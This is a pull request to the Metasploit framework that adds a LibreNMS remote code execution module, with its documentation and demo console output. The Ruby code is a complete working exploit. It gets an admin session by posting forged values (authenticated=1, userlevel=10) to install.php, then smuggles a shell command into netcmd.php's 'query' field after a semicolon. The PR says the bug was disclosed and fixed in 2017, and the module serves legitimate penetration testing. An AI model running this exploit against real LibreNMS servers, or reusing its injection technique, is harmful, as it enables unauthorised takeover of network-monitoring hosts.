### PR TITLE
Add a LibreNMS RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/librenms_rce.md
+++ b/documentation/modules/exploit/multi/http/librenms_rce.md
@@ -13,8 +13,8 @@ just make sure to get a version older than
   3. Do: `use exploit/multi/http/librenms_rce`
   4. Do: `set rport port`
   5. Do: `set rhost ip`
-  5. Do: `set cmd id`
-  6. Do: `exploit`
+  6. Do: `set cmd id`
+  7. Do: `exploit`
 ```
  msf exploit(librenms_rce) > run
 [*] Getting admin cookie...

--- a/documentation/modules/exploit/multi/http/librenms_rce.md
+++ b/documentation/modules/exploit/multi/http/librenms_rce.md
@@ -1,0 +1,53 @@
+[LibreNMS](http://www.librenms.org) is Community-based GPL-licensed network monitoring system 
+
+## Vulnerable Application
+
+You can get the application on its [github](https://github.com/librenms/librenms),
+just make sure to get a version older than
+[1205f12f10a87f50a9a9127ab3caea861bff91b9](https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/multi/http/librenms_rce`
+  4. Do: `set rport port`
+  5. Do: `set rhost ip`
+  5. Do: `set cmd id`
+  6. Do: `exploit`
+```
+ msf exploit(librenms_rce) > run
+[*] Getting admin cookie...
+[*] Got admin cookie: PHPSESSID=nmvg7q21egmrbg2enf27tjplt4;
+[*] Result of the command:
+uid=33(www-data) gid=33(www-data) groups=33(www-data),996(librenms)
+[*] Exploit completed, but no session was created.
+msf exploit(librenms_rce) > 
+```
+  9. You should get the admin cookie, and the result of your command.
+
+## Options
+
+  **TARGETURI**
+
+  TARGETURI by default is `/`, which is the common path for LibreNMS.
+  
+## Demonstration
+
+```
+msf > use multi/http/librenms_rce
+msf exploit(librenms_rce) > set cmd id
+cmd => id
+msf exploit(librenms_rce) > set RHOST 192.168.0.18
+RHOST => 192.168.0.18
+msf exploit(librenms_rce) > set payload cmd/unix/generic 
+payload => cmd/unix/generic
+msf exploit(librenms_rce) > run
+
+[*] Getting admin cookie...
+[*] Got admin cookie: PHPSESSID=nmvg7q21egmrbg2enf27tjplt4;
+[*] Result of the command:
+uid=33(www-data) gid=33(www-data) groups=33(www-data),996(librenms)
+[*] Exploit completed, but no session was created.
+msf exploit(librenms_rce) > 
+```

--- a/modules/exploits/multi/http/librenms_rce.rb
+++ b/modules/exploits/multi/http/librenms_rce.rb
@@ -33,8 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars' => "\x20&#",
         },
       'References'     => [
-        [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9'],
-      ]
+        [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9']
+      ],
       'Arch'           => ARCH_CMD,
       'Targets'        => [ [ 'Automatic',{}]],
       'Platform'       => %w{ linux unix },

--- a/modules/exploits/multi/http/librenms_rce.rb
+++ b/modules/exploits/multi/http/librenms_rce.rb
@@ -32,7 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops' => true,
           'BadChars' => "\x20&#",
         },
-      'References'     => [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9'],
+      'References'     => [
+        [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9']
+      ]
       'Arch'           => ARCH_CMD,
       'Targets'        => [ [ 'Automatic',{}]],
       'Platform'       => %w{ linux unix },

--- a/modules/exploits/multi/http/librenms_rce.rb
+++ b/modules/exploits/multi/http/librenms_rce.rb
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'LibreNMS RCE',
       'Description'    => %q{
-				This module exploit an auth-bypass in LibreNMS to get admin privileges,
-				and then executes code via a command injection.
+        This module exploit an auth-bypass in LibreNMS to get admin privileges,
+        and then executes code via a command injection.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -22,24 +22,24 @@ class MetasploitModule < Msf::Exploit::Remote
           'blotus',   # original discovery
           'bui',      # original discovery
           'jvoisin',  # original discovery and metasploit module
-				],
-				'Payload'        =>
-				{
-					'Compat' => {
+        ],
+        'Payload'        =>
+        {
+          'Compat' => {
             'PayloadType'  => 'cmd',
             'RequiredCmd'  => 'generic telnet perl ruby python',
-					},
-					'DisableNops' => true,
-					'BadChars' => "\x20&#",
-				},
-      'References'     => [ ],
+          },
+          'DisableNops' => true,
+          'BadChars' => "\x20&#",
+        },
+      'References'     => [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9'],
       'Arch'           => ARCH_CMD,
       'Targets'        => [ [ 'Automatic',{}]],
       'Platform'       => %w{ linux unix },
       'DisclosureDate' => 'Oct 18 2017',
       'Privileged' => false,
       'DefaultTarget'  => 0
-			))
+      ))
 
     register_options(
       [
@@ -48,39 +48,39 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-		print_status("Getting admin cookie...")
+    print_status("Getting admin cookie...")
     res = send_request_cgi({
       'method'  => 'POST',
       'uri'     => target_uri.path,
     })
     fail_with(Failure::Unknown, 'No response') if res.nil?
-		session_cookie = res.get_cookies
+    session_cookie = res.get_cookies
 
-		print_status("Got admin cookie: " + session_cookie)
-		send_request_cgi({
-			'method'  => 'POST',
-			'uri'     => normalize_uri(target_uri.path, '/install.php'),
-			'cookie'  => session_cookie,
-			'vars_post' => {
-				'authenticated' => 1,
-				'userlevel' => 10,
-				'user_id' => 0
-			}
-		})
+    print_status("Got admin cookie: " + session_cookie)
+    send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => normalize_uri(target_uri.path, '/install.php'),
+      'cookie'  => session_cookie,
+      'vars_post' => {
+        'authenticated' => 1,
+        'userlevel' => 10,
+        'user_id' => 0
+      }
+    })
 
     start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
     end_mark  = Rex::Text.rand_text_alpha(rand(5) + 5)
     custom_payload = "echo${IFS}#{start_mark};#{payload.encoded};echo${IFS}#{end_mark}"
-		res = send_request_cgi({
-			'method'  => 'GET',
-			'uri'     => normalize_uri(target_uri.path, '/netcmd.php'),
-			'cookie'  => session_cookie,
-			'vars_get' => {
-				'cmd' => 'nmap',
-				'debug' => 1,
-				'query' => 'http://lol;' + custom_payload
-			}
-		})
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, '/netcmd.php'),
+      'cookie'  => session_cookie,
+      'vars_get' => {
+        'cmd' => 'nmap',
+        'debug' => 1,
+        'query' => 'http://' + Rex::Text.rand_text_alpha(4, 8) + ';' + custom_payload
+      }
+    })
 
     if res and res.code == 200 and res.body =~ /#{start_mark}/
       # Prints output when using cmd/unix/generic

--- a/modules/exploits/multi/http/librenms_rce.rb
+++ b/modules/exploits/multi/http/librenms_rce.rb
@@ -1,0 +1,111 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS RCE',
+      'Description'    => %q{
+				This module exploit an auth-bypass in LibreNMS to get admin privileges,
+				and then executes code via a command injection.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'blotus',   # original discovery
+          'bui',      # original discovery
+          'jvoisin',  # original discovery and metasploit module
+				],
+				'Payload'        =>
+				{
+					'Compat' => {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic telnet perl ruby python',
+					},
+					'DisableNops' => true,
+					'BadChars' => "\x20&#",
+				},
+      'References'     => [ ],
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ [ 'Automatic',{}]],
+      'Platform'       => %w{ linux unix },
+      'DisclosureDate' => '2017-10-18',
+      'Privileged' => false,
+      'DefaultTarget'  => 0
+			))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+      ])
+  end
+
+  def exploit
+		print_status("Getting admin cookie...")
+    res = send_request_cgi({
+      'method'  => 'POST',
+      'uri'     => target_uri.path,
+    })
+    fail_with(Failure::Unknown, 'No response') if res.nil?
+		session_cookie = res.get_cookies
+
+		print_status("Got admin cookie: " + session_cookie)
+		send_request_cgi({
+			'method'  => 'POST',
+			'uri'     => normalize_uri(target_uri.path, '/install.php'),
+			'cookie'  => session_cookie,
+			'vars_post' => {
+				'authenticated' => 1,
+				'userlevel' => 10,
+				'user_id' => 0
+			}
+		})
+
+    start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
+    end_mark  = Rex::Text.rand_text_alpha(rand(5) + 5)
+    custom_payload = "echo${IFS}#{start_mark};#{payload.encoded};echo${IFS}#{end_mark}"
+		res = send_request_cgi({
+			'method'  => 'GET',
+			'uri'     => normalize_uri(target_uri.path, '/netcmd.php'),
+			'cookie'  => session_cookie,
+			'vars_get' => {
+				'cmd' => 'nmap',
+				'debug' => 1,
+				'query' => 'http://lol;' + custom_payload
+			}
+		})
+
+    if res and res.code == 200 and res.body =~ /#{start_mark}/
+      # Prints output when using cmd/unix/generic
+      result = res.body.split(/#{start_mark}\n/)[1].split(/\n#{end_mark}/)[0]
+      if not result.strip.empty?
+        print_status("Result of the command:\n#{result}")
+      end
+    end
+  end
+
+end
+
+# msf > use multi/http/librenms_rce
+# msf exploit(librenms_rce) > set cmd id
+# cmd => id
+# msf exploit(librenms_rce) > set RHOST 192.168.0.18
+# RHOST => 192.168.0.18
+# msf exploit(librenms_rce) > set payload cmd/unix/generic 
+# payload => cmd/unix/generic
+# msf exploit(librenms_rce) > run
+# 
+# [*] Getting admin cookie...
+# [*] Got admin cookie: PHPSESSID=nmvg7q21egmrbg2enf27tjplt4;
+# [*] Result of the command:
+# uid=33(www-data) gid=33(www-data) groups=33(www-data),996(librenms)
+# [*] Exploit completed, but no session was created.
+# msf exploit(librenms_rce) > 
+#

--- a/modules/exploits/multi/http/librenms_rce.rb
+++ b/modules/exploits/multi/http/librenms_rce.rb
@@ -92,20 +92,3 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 end
-
-# msf > use multi/http/librenms_rce
-# msf exploit(librenms_rce) > set cmd id
-# cmd => id
-# msf exploit(librenms_rce) > set RHOST 192.168.0.18
-# RHOST => 192.168.0.18
-# msf exploit(librenms_rce) > set payload cmd/unix/generic 
-# payload => cmd/unix/generic
-# msf exploit(librenms_rce) > run
-# 
-# [*] Getting admin cookie...
-# [*] Got admin cookie: PHPSESSID=nmvg7q21egmrbg2enf27tjplt4;
-# [*] Result of the command:
-# uid=33(www-data) gid=33(www-data) groups=33(www-data),996(librenms)
-# [*] Exploit completed, but no session was created.
-# msf exploit(librenms_rce) > 
-#

--- a/modules/exploits/multi/http/librenms_rce.rb
+++ b/modules/exploits/multi/http/librenms_rce.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars' => "\x20&#",
         },
       'References'     => [
-        [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9']
+        [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9'],
       ]
       'Arch'           => ARCH_CMD,
       'Targets'        => [ [ 'Automatic',{}]],

--- a/modules/exploits/multi/http/librenms_rce.rb
+++ b/modules/exploits/multi/http/librenms_rce.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_CMD,
       'Targets'        => [ [ 'Automatic',{}]],
       'Platform'       => %w{ linux unix },
-      'DisclosureDate' => '2017-10-18',
+      'DisclosureDate' => 'Oct 18 2017',
       'Privileged' => false,
       'DefaultTarget'  => 0
 			))


### PR DESCRIPTION
This module exploits an unauthenticated RCE in [LibreNMS]( https://github.com/librenms/librenms ) that we found months ago. We reported it the 18th of October 2017, and it was fixed the [same day]( https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9 ), so you might want to get a version of LibreNMS older than that to test this module.


# Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use multi/http/librenms_rce`
- [x] `set cmd id`
- [x] Set `RHOST`, `RPORT`
- [x] `set payload cmd/unix/generic`
- [x] `run`
- [x] **Verify** that your get the admin cookie
- [ ] **Verify** the that your get your command's output